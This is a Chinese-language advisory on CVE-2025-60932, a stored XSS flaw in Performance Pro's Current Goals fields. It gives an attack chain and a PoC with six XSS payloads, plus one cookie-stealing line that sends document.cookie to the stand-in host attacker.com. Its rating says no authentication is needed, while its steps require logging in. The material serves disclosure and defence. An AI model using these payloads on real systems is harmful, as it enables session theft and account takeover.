CVE-2025-60932：Performance Pro Current Goals功能存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-60932

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

HR Performance Solutions Performance Pro

漏洞概述

CVE-2025-60932是HR Performance Solutions旗下Performance Pro人力资源绩效管理系统v3.19.17版本中存在的一组存储型跨站脚本（Stored XSS）漏洞。该漏洞位于系统的Current Goals（当前目标）功能模块中，攻击者可以通过向Goal Name（目标名称）、Goal Notes（目标备注）、Action Step Name（行动步骤名称）、Action Step Description（行动步骤描述）、Note Name（备注名称）以及Goal Description（目标描述）等多个输入参数注入恶意构造的脚本或HTML代码，实现存储型XSS攻击。由于这些输入参数未经过充分的输出编码和输入过滤，恶意载荷将被持久化存储在服务器端，当其他合法用户访问相关页面时，恶意脚本将在其浏览器中自动执行。CVSS 3.1评分为6.1分，攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需特殊权限（PR:N），但需要用户交互（UI:R），作用域发生变化（S:C），对机密性和完整性产生低影响，对可用性无影响。该漏洞已于PP-Release-6.3.2.0版本中修复。Performance Pro作为一款企业级人力资源绩效管理解决方案，广泛用于员工目标设定、绩效评估和发展规划等场景，因此该漏洞可能影响使用该系统的众多企业的内部安全。

技术细节

该漏洞的根因在于Performance Pro v3.19.17版本的Current Goals功能模块对用户输入数据缺乏充分的输出编码和内容安全策略（CSP）保护。具体而言，当用户创建或编辑目标（Goal）及其关联的行动步骤（Action Step）和备注（Note）时，系统接收Goal Name、Goal Notes、Action Step Name、Action Step Description、Note Name和Goal Description等参数的值，但未对这些值进行HTML实体编码或JavaScript转义处理就直接存储到数据库中。当其他用户浏览包含这些目标信息的页面时，服务器从数据库中读取原始数据并直接嵌入到HTML响应中返回给浏览器，导致浏览器将恶意载荷解析为可执行脚本。攻击者可以利用此漏洞注入任意JavaScript代码，例如窃取用户会话Cookie、重定向用户到钓鱼页面、执行未授权操作（如以受害者身份修改数据）、记录键盘输入或利用浏览器漏洞进行进一步攻击。由于是存储型XSS，恶意载荷会持久化存在，影响所有后续访问相关页面的用户，攻击影响范围较大。漏洞的CVSS向量中作用域标记为Changed（S:C），表明攻击者可以通过该XSS漏洞影响超出Performance Pro应用本身的其他安全上下文。

攻击链分析

STEP 1

步骤1：侦察与目标确认

攻击者识别目标企业是否使用HR Performance Solutions Performance Pro v3.19.17版本，通过信息收集或社会工程学手段获取合法用户凭证或利用系统开放功能。

STEP 2

步骤2：获取访问权限

攻击者通过合法途径（如员工账户、钓鱼获取的凭证等）登录Performance Pro系统，访问Current Goals功能模块。

STEP 3

步骤3：构造恶意载荷

攻击者精心构造包含JavaScript/HTML的恶意XSS载荷，设计用于窃取会话Cookie、重定向用户或执行未授权操作。

STEP 4

步骤4：注入恶意脚本

攻击者在Goal Name、Goal Notes、Action Step Name、Action Step Description、Note Name或Goal Description等参数中注入恶意载荷并提交保存。

STEP 5

步骤5：载荷持久化存储

由于缺乏输出编码，恶意载荷被直接存储到数据库中，成为存储型XSS，影响所有后续访问相关页面的用户。

STEP 6

步骤6：触发恶意脚本执行

当其他用户（尤其是管理员）浏览包含恶意目标的页面时，浏览器解析并执行嵌入的恶意脚本。

STEP 7

步骤7：权限提升与数据窃取

恶意脚本在受害者浏览器上下文中执行，窃取会话Cookie、模拟用户身份执行敏感操作或获取企业敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
CVE-2025-60932 PoC - Stored XSS in Performance Pro Current Goals
Affected Parameters: Goal Name, Goal Notes, Action Step Name,
                    Action Step Description, Note Name, Goal Description
-->

<!-- Payload examples for each vulnerable parameter -->

<!-- 1. Goal Name parameter -->
<script>alert('XSS-GoalName-'+document.domain)</script>

<!-- 2. Goal Notes parameter -->
<img src=x onerror="alert('XSS-GoalNotes-'+document.cookie)">

<!-- 3. Action Step Name parameter -->
<svg onload=alert('XSS-ActionStepName')>

<!-- 4. Action Step Description parameter -->
<body onload="alert('XSS-ActionStepDesc')">

<!-- 5. Note Name parameter -->
<input onfocus=alert('XSS-NoteName') autofocus>

<!-- 6. Goal Description parameter -->
<iframe src="javascript:alert('XSS-GoalDesc')"></iframe>

<!--
Exploitation steps:
1. Authenticate to Performance Pro v3.19.17
2. Navigate to Current Goals module
3. Create a new Goal or edit an existing one
4. Inject one of the above payloads into the corresponding parameter field
5. Save the Goal/Action Step/Note
6. When any user (especially admin) views the affected Goal page,
   the malicious script executes in their browser context
7. Attacker can steal session cookies, perform actions as the victim,
   or pivot to further attacks
-->

<!-- Cookie stealing payload example (for demonstration only) -->
<script>new Image().src="http://attacker.com/steal?c="+document.cookie</script>

影响范围

HR Performance Solutions Performance Pro v3.19.17

HR Performance Solutions Performance Pro < PP-Release-6.3.2.0

防御指南

临时缓解措施

在无法立即升级到PP-Release-6.3.2.0修复版本的情况下，建议采取以下临时缓解措施：1）限制Current Goals功能的访问权限，仅向必要用户开放；2）在Web应用防火墙（WAF）中部署针对XSS攻击的检测规则，拦截包含<script>、onerror、onload等常见XSS关键字的请求；3）在HTTP响应头中启用Content-Security-Policy（CSP），限制内联脚本执行；4）为所有会话Cookie设置HttpOnly和Secure标志，防止Cookie被窃取；5）对管理员账户启用多因素认证，降低凭证被盗用的风险；6）加强用户安全意识培训，警惕可疑链接和页面；7）定期审查系统日志，检测异常的页面访问和操作行为；8）监控数据库中存储的用户输入内容，及时发现和清理已注入的恶意载荷。